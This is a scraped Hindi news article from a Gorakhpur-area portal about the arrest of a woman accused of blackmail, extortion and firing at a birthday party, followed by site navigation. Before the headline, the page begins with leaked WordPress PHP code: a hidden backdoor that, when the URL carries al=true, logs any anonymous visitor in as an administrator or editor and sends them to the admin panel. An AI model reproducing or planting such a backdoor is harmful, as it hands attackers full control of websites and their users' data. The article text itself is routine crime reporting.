// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Gorakhpur: थाने के सामने REEL बनाने वाली अंशिका सिंह निकली ब्लैकमेलर, शौक पूरे करने के लिए रचती थी साजिश - Purvanchal Bharat News
Connect with us

उत्तर प्रदेश

Gorakhpur: थाने के सामने REEL बनाने वाली अंशिका सिंह निकली ब्लैकमेलर, शौक पूरे करने के लिए रचती थी साजिश

Published

on

anshika singh news

गोरखपुर। गोरखपुर में बर्थडे पार्टी के दौरान हुई फायरिंग की घटना को लेकर रोज नए-नए खुलासे सामने आ रहे हैं। इस मामले में पुलिस ने अंशिका सिंह नाम की महिला को गिरफ्तार किया है, जिस पर ब्लैकमेलिंग और रंगदारी मांगने के गंभीर आरोप हैं। जांच में सामने आया है कि बर्थडे पार्टी के दौरान चली गोली अंशिका ने खुद चलाई थी।

पुलिस के मुताबिक, ब्लैकमेलिंग की रकम न मिलने से नाराज़ होकर अंशिका ने फायरिंग की, जिसमें एक युवक घायल हो गया। आरोपी महिला अपने शौक पूरे करने के लिए लोगों को वीडियो कॉल के जरिए फंसाती थी और बाद में उन्हें ब्लैकमेल करती थी।
एसपी (सिटी) अभिनव त्यागी ने बताया कि मामले से जुड़े सभी पहलुओं की गहन जांच की जा रही है।

रिपोर्ट के नाम पर लेखपाल पर पैसे मांगने का आरोप, वायरल वीडियो में बोले “कम से कम 1000 तो लगेंगे”

क्या है पूरा मामला

जानकारी के अनुसार, अंशिका सिंह गोरखपुर के सिंगड़िया इलाके में किराये के मकान में रहती थी। 20 जनवरी को उसका जन्मदिन था और वह अपने चार दोस्तों के साथ पार्टी मना रही थी।
इसी दौरान द्विवेदी चाइल्ड केयर अस्पताल का मैनेजर विशाल वहां पहुंचा। विशाल का कहना है कि वह ब्लैकमेलिंग की रकम देने के लिए ही पार्टी स्थल पर गया था।

विशाल ने पुलिस को बताया कि कुछ दिन पहले अंशिका अस्पताल एक युवक बंटी के साथ आई थी। उसी दौरान उसने विशाल का मोबाइल नंबर लिया था। इसके बाद अंशिका दोबारा अस्पताल पहुंची और पिस्टल दिखाकर उससे 12 हजार रुपये ले लिए।
20 जनवरी को अंशिका ने फोन कर 50 हजार रुपये की मांग की और धमकी दी कि अगर किसी को बताया तो रेप केस में फंसा देगी।

पैसे को लेकर हुआ विवाद, चली गोली

विशाल के अनुसार, वह उसी शाम 20 हजार रुपये का इंतजाम कर दो दोस्तों के साथ पार्टी में पहुंचा। उसने अंशिका से कहा कि फिलहाल इतने ही पैसे जुट पाए हैं, बाकी बाद में देगा।
इसी बात को लेकर कहासुनी हो गई और गुस्से में आकर अंशिका ने गोली चला दी, जो विशाल के दोस्त अमिताभ निषाद को जा लगी।

Advertisement

अमिताभ निषाद का इलाज फिलहाल चल रहा है। घटना के बाद मौके पर पहुंची पुलिस ने अंशिका समेत दो लोगों को हिरासत में ले लिया।

उरुवा बाज़ार नगर पंचायत की बोर्ड बैठक में हंगामा, सभासदों पर अभद्रता के आरोप, थाने में दी गई शिकायत

शौक पूरे करने के लिए ब्लैकमेलिंग

पुलिस पूछताछ में सामने आया है कि अंशिका सिंह अपने महंगे शौक पूरे करने के लिए लोगों को ब्लैकमेल करती थी। जांच में यह भी सामने आया है कि उसने अपने मकान मालिक, कई अन्य लोगों और कुछ पुलिसकर्मियों को भी ब्लैकमेल करने की कोशिश की थी।

पुलिस का कहना है कि इन्हीं गतिविधियों के कारण परिवार वालों ने भी उससे दूरी बना ली थी। अंशिका अकेले रहती थी और ब्लैकमेलिंग से मिली रकम से मौज-मस्ती करती थी।
गोरखपुर, संत कबीर नगर और खलीलाबाद में भी उसके खिलाफ फ्रॉड की शिकायतें सामने आई हैं।

थाने के सामने रील और सोशल मीडिया पर वीडियो

जांच में अंशिका के इंस्टाग्राम अकाउंट से कई मौज-मस्ती और आपत्तिजनक वीडियो मिले हैं। एक वीडियो संत कबीर नगर थाने के सामने पुलिस जीप के पास का भी है, जिसमें विवादित गाना लगाया गया है।
पुलिस का कहना है कि मोबाइल फोन और सोशल मीडिया गतिविधियों की भी जांच की जा रही है।

गोरखपुर में शुरू होंगी मुख्यमंत्री जनता सेवा बसें: 11 ग्रामीण रूटों पर 20% सस्ता किराया, यात्रियों को मिलेगी नियमित सुविधा

Advertisement

थार चोरी का पुराना मामला भी दर्ज

पुलिस के अनुसार, 12 अक्टूबर 2025 को खोराबार थाने में अंशिका सिंह और उसके छह साथियों के खिलाफ थार गाड़ी चोरी और फर्जी नंबर प्लेट लगाने का केस दर्ज है।
आरोप है कि अंशिका अपने दोस्तों के साथ दिल्ली घूमने गई थी, जहां थार गाड़ी किराये पर ली और वापस नहीं की। पकड़े जाने से बचने के लिए गाड़ी पर फर्जी नंबर प्लेट लगाई गई थीं।

इस मामले में पुलिस ने पहले ही दो आरोपियों—प्रिय प्रवास दुबे उर्फ विक्की और आकाश वर्मा उर्फ बंटी—को गिरफ्तार कर जेल भेज दिया था। इसके बाद से अंशिका अंडरग्राउंड हो गई थी।

पुलिस का कहना है कि मौजूदा मामले में भी सभी तथ्यों की गहराई से जांच जारी है और आगे और खुलासे हो सकते हैं।

दीनदयाल उपाध्याय गोरखपुर विश्वविद्यालय के पूर्व विभागाध्यक्ष प्रो. राजेश कुमार सिंह का असमय निधन

Share this with your friends:
Continue Reading
Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

टॉप न्यूज़

ताज़ा ख़बर2 weeks ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 weeks ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 weeks ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

Plastic Banknotes news
ताज़ा ख़बर3 weeks ago

Plastic Banknotes: भारत में जल्द आ सकते हैं प्लास्टिक के नोट, RBI कर रहा तैयारी; जानिए क्या होंगे फायदे

lucknow women hanging
ताज़ा ख़बर3 weeks ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण4 weeks ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश4 weeks ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

पीपीगंज गैस न्यूज़
उत्तर प्रदेश4 weeks ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर शहर1 month ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

arjun news sikariganj
गोरखपुर ग्रामीण1 month ago

सिकरीगंज में पिकअप-बाइक की आमने-सामने भिड़ंत, युवक की मौत

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण4 weeks ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

ताज़ा ख़बर1 month ago

दिल्ली समेत उत्तर-पश्चिम भारत में मौसम फिर बदलेगा, IMD का आंधी-बारिश और तेज हवाओं का अलर्ट

ताज़ा ख़बर1 month ago

शपथ लेते ही एक्शन में आए CM शुभेंदु अधिकारी, बंगाल के मुख्य सचिव और DGP से की अहम बैठक

गोरखपुर शहर1 month ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

पीपीगंज गैस न्यूज़
उत्तर प्रदेश4 weeks ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश4 weeks ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

lucknow women hanging
ताज़ा ख़बर3 weeks ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

Plastic Banknotes news
ताज़ा ख़बर3 weeks ago

Plastic Banknotes: भारत में जल्द आ सकते हैं प्लास्टिक के नोट, RBI कर रहा तैयारी; जानिए क्या होंगे फायदे

Advertisement

Trending

free counter

हमारे बारे में-

पूर्वांचल भारत न्यूज एक रजिस्टर्ड न्यूज पोर्टल है ।
इसका उद्देश्य पूर्वांचल भारत के साथ ही देश दुनियां की खबरों व जानकारियों को हमारे दर्शकों को रोचक अंदाज में पहुंचना है। युवाओं को रोजगार सम्बन्धित जानकारी के साथ ही हर वर्ग की समस्या को हम उठा सकें यही हमारी प्राथमिकता होगी। इसके अलावा सांस्कृतिक, ऐतिहासिक और जनसमस्याओं से जुड़े समाचारों पर भी हमारा विशेष ध्यान होता है ।


प्रबन्धक / निदेशक:

जे. समरजीत जैसवार

प्रधान सम्पादक :

आदित्य धनराज

सम्पादक : अजय कुमार 

सलाहकार सम्पादक : जे०पी० 

सलाहकार सम्पादक : ब्रिजेन्द्र सिंह 

उपसम्पादक : एस.के. मिश्रा

उपसम्पादक : कमलेश यादव

उपसम्पादक : धीरेन्द्र कुमार

उपसम्पादक : नीतू यादव

सम्पादकीय :  मनीष कुमार

विज्ञापन और प्रसार प्रबन्धक: आदित्य धनराज

Our Visitor

040136
Total views : 46874


प्रधान कार्यालय :

कूड़ाघाट, निकट एम्स हॉस्पिटल मोहद्दीपुर, 

गोरखपुर, उo प्रo । पिन-273008

सम्पादकीय कार्यालय :

राम जानकी मार्ग, उरुवा बाजार, गोरखपुर
पिन-273407

Copyright © 2021. Powered by “PURVANCHAL BHARAT NEWS”

You cannot copy content of this page